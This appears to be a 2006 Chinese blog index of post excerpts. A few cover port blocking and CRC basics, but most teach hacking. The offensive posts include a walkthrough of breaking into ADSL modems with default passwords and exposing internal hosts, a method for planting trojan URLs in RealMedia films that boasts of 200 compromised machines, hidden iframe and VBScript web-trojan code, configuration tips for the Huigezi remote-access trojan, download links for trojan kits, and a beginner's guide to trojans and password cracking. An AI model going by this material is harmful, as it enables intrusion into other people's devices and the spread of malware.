博文
怎样设置端口不被病毒攻击(2006-06-18 23:38:00)
摘要:怎样设置端口不被病毒攻击
默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些网络端口:
第一步,点击“ 开始” 菜单/设置/控制面板/管理工具,双击打开“ 本地安全策略” ,选中“ IP 安全策略,在本地计算机” ,在右边窗格的空白位置右击鼠标,弹出快捷菜单,选择“ 创建 IP 安全策略” (如右图),于是弹出一个向导。在向导中点击“ 下一步” 按钮,为新的安全策略命名;再按“ 下一步” ,则显示“ 安全通信请求” 画面,在画面上把“ 激活默认相应规则” 左边的钩去掉,点击“ 完成” 按钮就创建了一个新的IP 安全策略。
第二步,右击该IP安全策略,在“ 属性” 对话框中,把“ 使用添加向导” 左边的钩去掉,然后单击“ 添加” 按钮添加新的规则,随后弹出“ 新规则属性” 对话框,在画面上点击“ 添加” 按钮,弹出IP筛选器列表窗口;在列表中,首先把“ 使用添加向导” 左边的钩去掉,然后再点击右边的“ 添加” 按钮添加新的筛选器。
第三步,进入“ 筛选器属性” 对话框,首先看到的是寻址,源地址选“ 任何 IP 地址” ,目标地址选“ 我的 IP 地址” ;点击“ 协议” 选项卡,在“ 选择协议类型” 的下拉列表中选择“ TCP” ,然后在“ 到此端口” 下的文本框中输入“ 135” ,点击“ 确定” 按钮(如左图),这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器,它可以防止外界通过135端口连上你的电脑。
点击“ 确定” 后回到筛选器列表的对话框,可以看到已经添加了一条策略,重复以上步骤继续添加 TCP 137、139、445、593 端口和 UDP 135、139、445 端口,为它们建立相应的筛选器。
重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略,建立好上述端口的筛选器,最后点击“ 确定” 按钮。
第四步,在“ 新规则......
手把手教你穿透ADSL路由入侵内网 - - 转(2006-03-08 21:12:00)
摘要:也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对ADSL MODEM的 路由功能产生了浓厚的兴趣,经过一番努力,我终于找到了穿透ADSL路由入侵内网的方法,在这里和各位一起分享我的心得
一、扫描
现在很多ADSL MODEM都是通过 80 23 21 三个端口来管理,但80 21端口有很多服务器都有打开,没怎么特征性,于是我选择了23端口,打开我的至爱:SUPPERSCAN,填上我所在地区的IP段,(跨多几段都没关系,反正SUPPERSCAN的速度就是快)眨眼间,结果出来了,开23的主机还真不小啊:)我挑了几台出来,在浏览器那里输入IP:218.xxx.xxx.xxx,OK。登陆对话框出来了,输入USER:ADSL pass:adsl1234(因为我这里的adsl modem一般是华硕的,缺省是adsl adsl1234)bingle 一矢中的,现在我就是上帝。
二、映射
入侵已经成功了一半,要进一步入侵内网,我门要进行端口映射,但是我连内网的拓扑,都不知道(更不用说内网主机的端口开放情况了)又怎么映射呢?在此,我选择了猜测。一般来说,MODEM的内网IP缺省是192.168.1.1,而大多数就把自己主机的IP设成192.168.1.2。因此我们只要试试把192。168。1。2的端口映射出来就行了(但如果使用了dhcp就麻烦了)但是192。168。1。2到底开放了什么端口,我们根本就不知道啊,呵呵,既然不知道,那么我就把他整台主机透明地映射到外网,具体做法如下:进入NAT选项---添加NAT规则---BAMID---填入主机IP:192。168。1。2,到此192。168。1。2已经透明地映射到192。168。1。1上了,我们访问ADSL MODEM就等于访问主机192。168。1。2了
三、检测漏洞
现在我们再请出SUPPERSCAN对218。xxx.xxx.xxx进行扫描,呵,看到没有?扫描结果已经不同了,开放的端口是139 1433等,刚才只是开放了80 23 21 而已(也就是说我们的映射已经成功了)该是X-SCAN出手了,用它来扫弱口令最好不过了,但扫描的结果令人失望,一个弱口令也没有,看来管理员还不算低B啊
四、溢出
......
安全知识:端口·木马·安全·扫描应用知识(2006-02-26 11:27:00)
摘要:安全知识:端口·木马·安全·扫描应用知识
看到这个题目你也许有些奇怪,怎么把这几个词放在了一起,其实谈起端口和木马都是老生常谈了,但即使是常谈还有很多人的计算机被“冲击波”冲过之后又被“震荡波”狠狠地震了一下,看来很有必要再谈谈老话题,免得再被什么波温柔地扫过。其实说这些最终的目的就是为了保证计算机的上网安全。
一、 端口
一)、端口的一般含义
说到端口,这确实是个老话题,但一切都是从它开始的,不得不说。何谓端口,打个比方,你住在一座房子里,想让别人来拜访你,得在房子上开个大门,你养了个可爱的小猫,为了它的进出,专门给它修了个小门,为了到后花园,又开了个后门……所有这些为了进到这所房子里而开的门我们叫它端口,这些为了别人进来而开的端口称它为"服务端口"。
你要拜访一个叫张三的人,张三家应该开了个允许你来的门____服务端口,否则将被拒之门外。去时,首先你在家开个"门",然后通过这个"门"径直走进张三家的大门。为了访问别人而在自己的房子开的"门",我们称它为"客户端口"。它是随机开的而且是主动打开的,访问完就自行关闭了。它和服务端口性质是不一样的,服务端口是开了个门等着别人来访问,而客户端口是主动打开一个门去打开别人的门,这点一定要清楚。
下面我们从专业的角度再简单解释一下端口的概念。联网的计算机要能相互通信必须用同一种协议,协议就是计算机通信的语言,计算机之间必须说一种语言才能彼此通信,Internet的通用语言是TCP/TP,它是一组协议,它规定在网络的第四层运输层有两种协议TCP、UDP。端口就是这两个协议打开的,端口分为源端口和目的端口,源端口是本机打开的,目的端口是正在和本机通信的另一台计算机的端口,源端口分主动打开的客户端口和被动连接的服务端口两种。在Internet中,你访问一个网站时就是在本机开个端口去连网站服务器的一个端口,别人访问你时也是如此。也就是说计算机的通讯就像我们互相串门一样,从这个门走进哪个门。
当你装好系统后默认就开了很多"服务端口"。如何知道自己的计算机系统开了那些端口呢?这就是下面要说的:
二)、查看端口的方法
1、命令方式
下面以Windows XP为例看看新安装的系统都开了那些......
删除rmvb文件的弹出广告 (2006-02-26 11:21:00)
摘要:
于: 二月 07, 2006, 10:07:49 pm (转)
-----------------------------------------------------------------------------------------------------------------
经常遇到rm影片播放时弹出网页,一直不知道怎么回事,前几天看到了大众软件中一篇文章才知道插入和去除的方法,好东东不敢独享,在网上搜了三篇相关文章,转给大家拉!
在Real影片中放木马
在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的交流软件PP点点通里,我下了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。
使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.
新建一个文本文件rmevents.txt.
输入:
u 00:01:00.0 00:01:30.0 http://www.smf.cn/bbs
我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的木马地址。
输入rmevents -i 电影.rm -e rmevents.txt -o 电影1.rm 这个命令,生成的电影.rm就是我们的木马文件了。
http://www.smf.cn/bbs这个地址是你做好的网页木马的地址,不管是动鲨木马啊,还是EXE2BMP的木马,还是什么CHM木马.
防御方法更简单,嘿嘿,不看电影就没事了。要不就不用Realpalyer看吧,换别的播放器。
去除realoneplay,里的网页问题
这个弹出的网页是由一开始压制影片的人压进去的广告页。可以通过Helix Producer Plus V9.01 的rmevents.exe编辑掉。
方法一:
在你的安装目录C:\Program Files\Real\Helix Producer Plus\RealMediaEditor默认是这个目录,里有一个rmevents.exe
在命令提示行cmd.exe下进入......
CRC技术的实现与破解(2006-02-23 21:54:00)
摘要:标 题: 【原创】CRC技术的实现与破解(10.21更新)
发帖人:vipchenji
时 间: 2005-09-26 16:23
原文链接:http://bbs.pediy.com/showthread.php?threadid=17195
详细信息:
这是一个已经发表的文章,用于普及知识,今天冒昧放上,请各位点评!
上次发的是全文字版,经过修改,再发一次图文版(注:完整图文版请到上面的原谅链接页面下载)
其中参考了看雪学院中的一些精华,再次也向各位致敬!
CRC 在软件加密保护中的应用
或名(用CRC 打造软件的外衣)
注:本文相关图片没收录,带图PDF格式请到这下载:http://bbs.pediy.com/showthread.php?s=&threadid=17195
CRC(CyclicRedundancyCheck,直译:循环冗余校验)技术是一项很成熟的技术,在众多领域有广泛的应用,在数据存储和通信传输应用中处处都可以看到它的身影。最常用的CRC
校验形式有CRC-16,CRC-32两种形式,采用CRC-16校验,可以保证在1014 位码元中只含有一位未被检测出的错误,采用CRC-32校验的出错概率比CRC-16还低105 倍。CRC的主要特点
就是:检错能力极强,开销很小,易于实现。从性能和开销上综合考虑,其远远优于奇偶校验及算术和校验等方式。因此,很多软件在加密保护时都将CRC技术应用其中。本文拟从
CRC校验的原理解剖入手,用实际代码和应用给大家解析CRC校验在软件加密中的实际应用,希望能给您的软件加密保护提供一些帮助和建议。
CRC 校验的原理解析
在实际应用中,根据环境和需求的变化,CRC形成了多种变形方式。比如:通讯协议X.25的帧检错序列采用的是CRC-CCITT方式,ARJ、LHA、ZIP等压缩软件采用的是CRC-32方式,磁
盘驱动器的读写采用的是CRC-16方式,GIF、TIFF等图像存储格式也使用CRC作为检错技术。目前,比较流行的CRC形式主要是:CR......
如何写隐藏的网页病毒木马(2006-02-22 12:39:00)
摘要:--------------------------------------------------------------------------------
文章作者: 文章来源:网络共享 发布时间:2005-05-08 07:49:05
注:本文只是大家学习知识的一个平台,请勿恶意之用!
今上在网上浏览网页的时候,在不知不觉中,中了网页病毒,我本来是开着瑞星杀毒的,也是昨天才升级的
却一点也没反应说有毒入侵,在经过一番折腾之后,终于明白他的机理.记录如下
[第一步]
我首先有用flashget下载了有病毒的网页,看源文件,里头有这一行代码
<iframe src=http://my.5e163.com/ie.htm width=0 height=0 frameborder=0 scrolling=NO></iframe>
这一行代码,好明显是说明不显示网页中,却它在网页中,说明不怀好意~~~~
[第二步]
我接着再用flashget 下载上面的http://my.5e163.com/ie.htm,再看源代码
只有四句
<html>
<object data="http://my.5e163.com/com88.test">
</object>
</html>
[第三步]
再下载http://my.5e163.com/com88.test得出如下代码
<html>
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script LANGUAGE="VBscript.Encode">
wsh.RegWrite "H"&"KC"&"U\So"&"ftw"&"are\Mi"&"cro"&"sof"&"t\In"&"ter"&"ne"&......
灰鸽子sunray破解版的ip.txt(2006-02-22 12:30:00)
摘要:关于怎样生成服务端,网上的教程很多,但是多数教程都将ip.txt的内容写成http://huigezi212.126.131.43:8000end但是我在自己的机子上试过了,不行,后来我将其改为:http://*.*.*.*:8000/wwwroot/就可以了
......
网页木马成长日记(2006-02-22 12:21:00)
摘要:网页木马成长日记 - -(转)
主题:网页木马专题之一
总有一个想法,想把我多年收集的网页木马有关东东送给大家,只是一是没有时间,二是有些舍不得。不过还是决定了,现在就开始写教程了。从最古老的网页木马开始写起。最古老的网页木马当然是失效了并被杀毒软件查杀的,不过你有兴趣每天来看一下,总会看到最新的。现在来写第一个:
它利用Wsh(Windows Scripting Host Object Reference,简称Wsh,在windows的默认安装时都有的,绝大多数上网用户都没有卸载它) 结合Javascript在你的注册表里动一下手脚,再用服务器端脚本程序像asp、php啦来记录访问者的有关信息,浏览之后,c盘就会不知不觉被完全共享;同时你的ip地址、访问时间、操作系统名称还会被此网页木马所记录。我给出一个我写的网页木马代码(只针对win9x)和简单注释,如下:
为了省去大家输入的麻烦,并且我这个网页会过滤很多东东,所以我把全部代码已经写好,你可以在下载得到这一asp文件
[url]http://www.haiyangtop.net/exe.rar[/url]
主题:网页木马专题之二
通过activex控件制做的网页木马。通过 ActiveX 把普通的软件转化为可以在你的主页直接执行的软件的网页木马! 该网页木马对所有的系统和IE版本都有效,缺点是会在浏览此网页木马是会弹出对话框,询问是否安装此插件。
很多在线工具都是用tegoweb express来制作完成,能不能运行成功,就要看人是意点签名工具了。
我手头上还有有几个伪造3721、百度签名的网页木马生成器。不过,我从来没用过。下载地址是:
[url]http://www.haiyangtop.net/acrtiv.rar[/url]
主题:网页木马专题之三
这个还是利用了wsh修改注册表后,使其IE的“没有标记为安全的的activex控件和插件默认设置改为启用”。然后再利用一些可以本地运行exe的网页代码来运行。虽然这个网页木马已经过时,但是发现ie安全漏洞可以提升权限达到本地运行网页的效果,这是以后众多网页木马制的作的思路。
[url]http://www.haiyangtop.net/m3.rar[/url]
主题:网页木马专题之四......
黑客快速入门 — —[转帖](2006-02-21 18:12:00)
摘要:黑客快速入门 — —
我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。
第一节,伸展运动。这节*我们要准备道具,俗话说:"工欲善其事,必先利其器"(是这样吗?哎!文化低......)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。
1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap?呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。
2,windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆game fan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。
3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河*作也会减少工作量(我是懒虫,爽!)
4,oicq。我们学黑客,可不是学泡mm!bfctx你............ 息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊,偷个密码代表什么,浪费时间!最后补充:mm不能不泡。(谁砸我??!!)
5,superscan。很好用的端口扫描器,速度超快,功能一流,一旦拥有,别无所求......(打住!)不论是找木马受害者,还是扫服务器端口,它都非常有效,cshu强烈推荐!
6,一本笔记本/便条,网上资料相当多,黑客处理的也是非常之多。良好的习惯决定了你的效率,准备一本笔记本,记录下你的成果,肉鸡,木马利用,命令,密码......坚持一下,你会发现你的效率大幅上升的!
7,lc3.著名nt/2000sam破解程序,有时我们拿不到足够权限,又没好办法,那么lc3是最好的解决办法,只要你拿的......